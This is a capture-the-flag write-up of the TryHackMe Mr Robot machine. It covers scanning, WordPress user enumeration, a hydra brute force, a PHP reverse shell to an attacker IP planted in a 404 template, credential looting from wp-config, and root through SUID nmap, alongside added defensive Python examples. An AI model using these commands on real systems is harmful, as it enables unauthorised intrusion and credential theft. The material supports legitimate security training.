
Daniel Cano Merchán - Hacking & Tech

Writeup Tryhackme Mr Robot

Writeup about the Tryhackme machine Mr Robot.

0 - Basic info

Unknown machine, black box

1 - Reconnaissance and enumeration

Quick Ping:

ping -c 1 10.10.😄
PING 10.10.😄 (10.10.😄) 56(84) bytes of data.
64 bytes from 10.10.😄: icmp_seq=1 ttl=63 time=181 ms

--- 10.10.😄 ping statistics ---
1 packets transmitted, 1 received, 0% packet loss, time 0ms
rtt min/avg/max/mdev = 180.594/180.594/180.594/0.000 ms

TTL 63 (a default of 64 minus one hop), so it is a Linux machine.

Quick port scan:

nmap -p- --open -T5 -v 10.10.😄 -n -Pn -oG ports.txt
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-07-13 18:09 CEST
Initiating Connect Scan at 18:09
Scanning 10.10.😄 [65535 ports]
Discovered open port 80/tcp on 10.10.😄
Discovered open port 443/tcp on 10.10.😄
Connect Scan Timing: About 28.91% done; ETC: 18:11 (0:01:16 remaining)
Connect Scan Timing: About 55.63% done; ETC: 18:11 (0:00:49 remaining)
Completed Connect Scan at 18:11, 107.19s elapsed (65535 total ports)
Nmap scan report for 10.10.😄
Host is up (0.041s latency).
Not shown: 65532 filtered ports, 1 closed port
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT    STATE SERVICE
80/tcp  open  http
443/tcp open  https

Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 107.39 seconds

Only ports 80 and 443 are open, so it looks like a standard web server. Service and script scan on those ports:

nmap -sC -sV -Pn -p$(cat ports.txt | grep -oP '\d{2,5}/open' | tr '/open' ' ' | xargs | tr ' ' ',') 10.10.😄 -oN full_scan.txt
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-07-13 18:12 CEST
Nmap scan report for 10.10.😄
Host is up (0.036s latency).

PORT    STATE SERVICE  VERSION
80/tcp  open  http     Apache httpd
|_http-server-header: Apache
|_http-title: Site doesn't have a title (text/html).
443/tcp open  ssl/http Apache httpd
|_http-server-header: Apache
|_http-title: Site doesn't have a title (text/html).
| ssl-cert: Subject: commonName=www.example.com
| Not valid before: 2015-09-16T10:45:03
|_Not valid after:  2025-09-13T10:45:03

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 16.37 seconds

Cool and depressing stuff from the Mr Robot series 😎 on ports 80 and 443.


The site is running WordPress; for a better analysis let's use wpscan:

wpscan --url http://10.10.😄/join --api-token=API_TOKEN

It reports a lot of vulnerabilities. If I cannot find anything more evident I will come back here, because the WordPress version is very old.

Also enumerating with gobuster:

gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://10.10.😄
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.😄
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Timeout:                 10s
===============================================================
2021/07/13 18:38:39 Starting gobuster in directory enumeration mode
===============================================================
/images               (Status: 301) [Size: 234] [--> http://10.10.😄/images/]
/blog                 (Status: 301) [Size: 232] [--> http://10.10.😄/blog/]
/rss                  (Status: 301) [Size: 0] [--> http://10.10.😄/feed/]
/sitemap              (Status: 200) [Size: 0]
/login                (Status: 302) [Size: 0] [--> http://10.10.😄/wp-login.php]
/0                    (Status: 301) [Size: 0] [--> http://10.10.😄/0/]
/video                (Status: 301) [Size: 233] [--> http://10.10.😄/video/]
/feed                 (Status: 301) [Size: 0] [--> http://10.10.😄/feed/]
/image                (Status: 301) [Size: 0] [--> http://10.10.😄/image/]
/atom                 (Status: 301) [Size: 0] [--> http://10.10.😄/feed/atom/]
/wp-content           (Status: 301) [Size: 238] [--> http://10.10.😄/wp-content/]
/admin                (Status: 301) [Size: 233] [--> http://10.10.😄/admin/]
/audio                (Status: 301) [Size: 233] [--> http://10.10.😄/audio/]
/intro                (Status: 200) [Size: 516314]
/wp-login             (Status: 200) [Size: 2657]
/css                  (Status: 301) [Size: 231] [--> http://10.10.😄/css/]
/rss2                 (Status: 301) [Size: 0] [--> http://10.10.😄/feed/]
/license              (Status: 200) [Size: 309]
/wp-includes          (Status: 301) [Size: 239] [--> http://10.10.😄/wp-includes/]
/js                   (Status: 301) [Size: 230] [--> http://10.10.😄/js/]
/Image                (Status: 301) [Size: 0] [--> http://10.10.😄/Image/]
/rdf                  (Status: 301) [Size: 0] [--> http://10.10.😄/feed/rdf/]
/page1                (Status: 301) [Size: 0] [--> http://10.10.😄/]
/readme               (Status: 200) [Size: 64]
/robots               (Status: 200) [Size: 41]
/dashboard            (Status: 302) [Size: 0] [--> http://10.10.😄/wp-admin/]
/%20                  (Status: 301) [Size: 0] [--> http://10.10.😄/]

Interesting info in robots.txt:

http://10.10.😄/robots

User-agent: *
fsocity.dic
key-1-of-3.txt

http://10.10.😄/key-1-of-3.txt

First flag done:

073403c8😄

http://10.10.😄/phpmyadmin

But it is only accessible via localhost or an SSH tunnel, not fun.

Getting the fsocity.dic:

wget http://10.10.😄/fsocity.dic

2 - Vulnerability Identification

Basic testing shows that the WordPress site leaks valid usernames, because the login error message reveals whether a given user exists.

Testing admin/admin:


With this idea I can enumerate users.

Looking inside the dictionary found in robots.txt, two words got my attention: Robot and Elliot. Robot failed, but Elliot got a different error:

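From the defender's side, the two different error texts are the whole bug: the application tells the client which half of the credential was wrong. The following added example (my own code, not from the writeup and not WordPress code; the user store, salts and passwords are constructed) shows a login handler with the leaky behaviour next to a hardened one that returns the same message for an unknown user and a wrong password, and that does the same hashing work in both cases so timing does not give the answer away either:

```python
import hashlib
import hmac
import secrets
from typing import Tuple

# Constructed demo user store (username -> (salt, PBKDF2 hash)); nothing here comes from the target.
def _hash(password: str, salt: bytes) -> bytes:
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 10_000)

_SALT = secrets.token_bytes(16)
USERS = {"elliot": (_SALT, _hash("correct horse battery staple", _SALT))}

# Dummy credential used for unknown usernames so the hashing work (and thus the timing) is the same.
_DUMMY_SALT = secrets.token_bytes(16)
_DUMMY_HASH = _hash(secrets.token_hex(8), _DUMMY_SALT)

GENERIC_ERROR = "Invalid username or password."


def login_leaky(username: str, password: str) -> Tuple[bool, str]:
    """Behaviour observed on the box: the error text tells you whether the user exists."""
    record = USERS.get(username.lower())
    if record is None:
        return False, "Invalid username."
    salt, stored = record
    if not hmac.compare_digest(_hash(password, salt), stored):
        return False, f"The password you entered for the username {username} is incorrect."
    return True, "ok"


def login_hardened(username: str, password: str) -> Tuple[bool, str]:
    """Same outcome either way: one generic message, and a hash is always computed."""
    known = username.lower() in USERS
    salt, stored = USERS.get(username.lower(), (_DUMMY_SALT, _DUMMY_HASH))
    matched = hmac.compare_digest(_hash(password, salt), stored)
    if known and matched:
        return True, "ok"
    # 'known' is checked as well so that guessing the dummy password can never log anyone in.
    return False, GENERIC_ERROR


def messages_differ(login_fn, unknown_user: str, known_user: str) -> bool:
    """True if a bogus user and a wrong password for a real user yield different messages (the leak)."""
    return login_fn(unknown_user, "wrong")[1] != login_fn(known_user, "wrong")[1]


if __name__ == "__main__":
    print("leaky handler leaks usernames:   ", messages_differ(login_leaky, "nobody", "Elliot"))
    print("hardened handler leaks usernames:", messages_differ(login_hardened, "nobody", "Elliot"))
```

On a real WordPress install the equivalent fix is to rewrite the error through the `login_errors` filter (or a plugin that does it), and to pair it with rate limiting on wp-login.php, since a uniform message only slows enumeration down; it does nothing against the dictionary attack that follows.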

So Elliot is a valid user. I tried to brute-force the login page, but it was slow as hell because the wordlist is badly constructed.

There are many repeated words:

Furious
Furious
Furious
Furious
Furious
Furious
Furious
Furious
Furious
Furious
Furious
Furious
cat fsocity.dic | wc
 858160  858160 7245381

A little tuning with sort -u to keep only unique words reduces the dictionary a lot:

cat fsocity.dic | sort -u | wc
  11451   11451   96747

Creating a new dictionary with unique words:

cat fsocity.dic | sort -u > good.dic

Launching hydra again:

hydra -l "Elliot" -P good.dic 10.10.😄 http-form-post '/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log In&redirect_to=http%3A%2F%2F10.10.😄%2Fwp-admin%2F&testcookie=1:The password you entered for the username' -I -V

After a while the brute-force attack worked:

[80][http-post-form] host: 10.10.😄   login: Elliot   password: E****
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2021-07-13 20:51:59
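What the attack above looks like from the web server's side is a burst of POST requests to /wp-login.php from one source address, each answered with a 200 (the login form again) until a 302 to wp-admin marks the hit. The following added example (my own detection logic, not from the writeup; the Apache combined-log layout is assumed and every log line is constructed) flags a source IP once it exceeds a threshold of login POSTs inside a sliding window and records the first 302 that follows the burst, which is the event worth paging on:

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta, timezone
from typing import Dict, List, Optional

# Apache "combined" log layout is assumed; every line fed in below is constructed for the example.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+)[^"]*" (?P<status>\d{3}) '
)
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"


def parse_line(line: str) -> Optional[dict]:
    """Return the fields we need from one access-log line, or None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    return {
        "ip": m["ip"],
        "ts": datetime.strptime(m["ts"], TS_FMT),
        "method": m["method"],
        "path": m["path"],
        "status": int(m["status"]),
    }


def detect_login_bruteforce(lines: List[str], window_s: int = 60, threshold: int = 20) -> Dict[str, dict]:
    """Flag source IPs that POST to /wp-login.php at least `threshold` times inside a sliding window.

    WordPress answers a failed login with 200 (the form again) and a successful one with a
    302 to wp-admin, so a 302 arriving after a flagged burst is recorded as a probable success.
    """
    recent: Dict[str, deque] = defaultdict(deque)
    alerts: Dict[str, dict] = {}
    for line in lines:
        ev = parse_line(line)
        if ev is None or ev["method"] != "POST" or not ev["path"].startswith("/wp-login.php"):
            continue
        q = recent[ev["ip"]]
        q.append(ev["ts"])
        while q and (ev["ts"] - q[0]).total_seconds() > window_s:
            q.popleft()  # drop attempts that fell out of the window
        if ev["ip"] in alerts:
            alerts[ev["ip"]]["attempts"] += 1
        elif len(q) >= threshold:
            alerts[ev["ip"]] = {"attempts": len(q), "first_seen": q[0], "success_at": None}
        if ev["ip"] in alerts and ev["status"] == 302 and alerts[ev["ip"]]["success_at"] is None:
            alerts[ev["ip"]]["success_at"] = ev["ts"]
    return alerts


def _line(ip: str, ts: datetime, method: str, path: str, status: int, size: int) -> str:
    return f'{ip} - - [{ts.strftime(TS_FMT)}] "{method} {path} HTTP/1.1" {status} {size} "-" "Mozilla/5.0"'


# Constructed sample: one benign visitor (10.9.0.7), one attacker (10.9.0.5) doing 24 failed
# logins in 24 seconds followed by a 302, then a single legitimate login from the visitor.
_T0 = datetime(2021, 7, 13, 20, 50, 0, tzinfo=timezone.utc)
SAMPLE_LOG = (
    [_line("10.9.0.7", _T0, "GET", "/blog/", 200, 4123)]
    + [_line("10.9.0.5", _T0 + timedelta(seconds=i), "POST", "/wp-login.php", 200, 2657) for i in range(24)]
    + [_line("10.9.0.5", _T0 + timedelta(seconds=24), "POST", "/wp-login.php", 302, 0)]
    + [_line("10.9.0.7", _T0 + timedelta(seconds=30), "POST", "/wp-login.php", 302, 0)]
)

if __name__ == "__main__":
    for ip, alert in detect_login_bruteforce(SAMPLE_LOG).items():
        print(ip, alert)
```

The threshold and window are deliberately generous; a real dictionary run at hydra's default parallelism produces far more than 20 POSTs a minute, while a human mistyping a password a few times never trips it. The same counter is what a rate limiter on the login endpoint would key on.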

So I can log in to the WordPress site.

Inside there are 2 users:


[80][http-post-form] host: 10.10.😄   login: Elliot   password: ER😄

3 - Exploit

This time I put a reverse shell in the theme's 404 template (Twenty Fifteen: 404 Template (404.php)):

exec("/bin/bash -c 'bash -i >& /dev/tcp/10.9.😄/8080 0>&1'");

And triggered the 404 page with a random URL:

http://10.10.😄/nothing

nc -lvp 8080
listening on [any] 8080 ...
10.10.😄: inverse host lookup failed: Unknown host
connect to [10.9.😄] from (UNKNOWN) [10.10.😄] 51267
bash: cannot set terminal process group (1760): Inappropriate ioctl for device
bash: no job control in this shell
daemon@linux:/opt/bitnami/apps/wordpress/htdocs$

Worked:

daemon@linux:/opt/bitnami/apps/wordpress/htdocs$ id
id
uid=1(daemon) gid=1(daemon) groups=1(daemon)

Upgraded my shell with Python and the usual stty magic:

python -c 'import pty;pty.spawn("/bin/bash")'

stty raw -echo
fg
reset
xterm

export TERM=xterm
export SHELL=bash

stty rows 19 columns 238

Looting credentials from wp-config.php:

define('FS_METHOD', 'ftpext');
define('FTP_BASE', '/opt/bitnami/apps/wordpress/htdocs/');
define('FTP_USER', 'bitnamiftp');
define('FTP_PASS', 'inevoL7e😄');
define('FTP_HOST', '127.0.0.1');
define('FTP_SSL', false);


// ** MySQL settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define('DB_NAME', 'bitnami_wordpress');

/** MySQL database username */
define('DB_USER', 'bn_wordpress');

/** MySQL database password */
define('DB_PASSWORD', '570😄');

/** MySQL hostname */
define('DB_HOST', 'localhost:3306');

/** Database Charset to use in creating database tables. */
define('DB_CHARSET', 'utf8');

/** The Database Collate type. Don't change this if in doubt. */
define('DB_COLLATE', '');

Inside /home the only user with a home directory is robot:

daemon@linux:/home/robot$ cat key-2-of-3.txt
cat: key-2-of-3.txt: Permission denied
daemon@linux:/home/robot$ cat password.raw-md5
robot:c3fcd😄

There are the next flag and robot's password as an MD5 hash. Let's crack it with john.

I tried the fsocity.dic wordlist but it did not work, so I used rockyou instead and it worked fine:

john hash_robot.txt --format=raw-md5 --wordlist=/usr/share/wordlists/rockyou.txt
john --show  --format=raw-md5  hash_robot.txt
robot:😄

1 password hash cracked, 0 left

Logging in as robot:

robot@linux:~$ id
uid=1002(robot) gid=1002(robot) groups=1002(robot)

Flag 2/3 done, only one left:

robot@linux:~$ cat key-2-of-3.txt
822c7😄

4 - Post-Exploitation and privilege escalation

Now, with a low-privileged account, I started enumerating the usual things:

robot@linux:~$ cat /etc/crontab
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.

SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

# m h dom mon dow user	command
17 *	* * *	root    cd / && run-parts --report /etc/cron.hourly
25 6	* * *	root	test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6	* * 7	root	test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6	1 * *	root	test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
#
30 * * * * bitnami cd /opt/bitnami/stats && ./agent.bin --run -D

Nothing useful, so I uploaded linpeas.sh to the machine and discovered nmap with the SUID bit set:

python3 -m http.server 7777
Serving HTTP on 0.0.0.0 port 7777 (http://0.0.0.0:7777/) ...
10.10.😄 - - [13/Jul/2021 21:28:44] "GET /linpeas.sh HTTP/1.1" 200
robot@linux:/tmp$ /usr/local/bin/nmap -V

nmap version 3.81 ( http://www.insecure.org/nmap/ )

This old version still has interactive mode, which combined with the SUID bit gives a root shell (see GTFOBins):

https://gtfobins.github.io/gtfobins/nmap/

robot@linux:/tmp$ /usr/local/bin/nmap --interactive

Starting nmap V. 3.81 ( http://www.insecure.org/nmap/ )
Welcome to Interactive Mode -- press h <enter> for help
nmap> !sh
# whoami
root

Machine rooted!

# cat key-3-of-3.txt
04787😄
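The root cause here is not nmap itself but a setuid bit on a program that can spawn a shell, which is exactly the kind of thing linpeas surfaced. The following added example (my own audit script, not from the writeup or from linpeas; the allowlist of expected setuid binaries and the short list of shell-capable program names are constructed assumptions that should be adjusted per distribution) walks the usual binary directories, skips the setuid files a stock Debian/Ubuntu-style host is expected to carry, and reports the rest, with anything shell-capable marked critical:

```python
import os
import stat
from typing import Dict, Iterable, Optional

# Constructed baseline of setuid binaries a stock Debian/Ubuntu-style host ships with (adjust per build).
EXPECTED_SUID = {
    "/usr/bin/passwd", "/usr/bin/sudo", "/usr/bin/su", "/usr/bin/chsh", "/usr/bin/chfn",
    "/usr/bin/gpasswd", "/usr/bin/newgrp", "/usr/bin/mount", "/usr/bin/umount",
    "/bin/su", "/bin/mount", "/bin/umount", "/bin/ping",
}
# Program names that must never be setuid because they can run a shell or write arbitrary files
# (a small subset of what GTFOBins documents; nmap is the one found on this box).
SHELL_CAPABLE = {"nmap", "vim", "vi", "find", "bash", "sh", "python", "perl", "less", "more"}


def is_setuid(mode: int) -> bool:
    """True for a regular file whose mode carries the setuid bit (directories and symlinks are ignored)."""
    return stat.S_ISREG(mode) and bool(mode & stat.S_ISUID)


def classify(path: str, mode: int) -> Optional[str]:
    """None if not setuid, else 'expected', 'critical' (shell-capable) or 'unexpected'."""
    if not is_setuid(mode):
        return None
    if path in EXPECTED_SUID:
        return "expected"
    name = os.path.basename(path)
    # strip a version suffix such as python3 or python3.8 before matching
    if name in SHELL_CAPABLE or name.rstrip("0123456789.") in SHELL_CAPABLE:
        return "critical"
    return "unexpected"


def audit_setuid(roots: Iterable[str] = ("/usr", "/bin", "/sbin", "/opt")) -> Dict[str, str]:
    """Walk the given roots and return {path: verdict} for every setuid file not in the baseline."""
    findings: Dict[str, str] = {}
    seen = set()
    for root in roots:
        for dirpath, _dirs, files in os.walk(root):
            for fn in files:
                path = os.path.join(dirpath, fn)
                try:
                    st = os.lstat(path)  # lstat: never follow symlinks
                except OSError:
                    continue
                key = (st.st_dev, st.st_ino)
                if key in seen:  # /bin -> /usr/bin merged-usr duplicates
                    continue
                seen.add(key)
                verdict = classify(path, st.st_mode)
                if verdict and verdict != "expected":
                    findings[path] = verdict
    return findings


if __name__ == "__main__":
    for path, verdict in sorted(audit_setuid().items()):
        print(f"{verdict:10} {path}")
```

Run as a cron job and diffed against the previous run, this is a cheap file-integrity check for the one class of permission bit that turns any local account into root; the fix on this box would simply be `chmod u-s /usr/local/bin/nmap` (or removing the ancient nmap altogether), since port scanning never needs setuid root on a web server.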

Thanks for reading!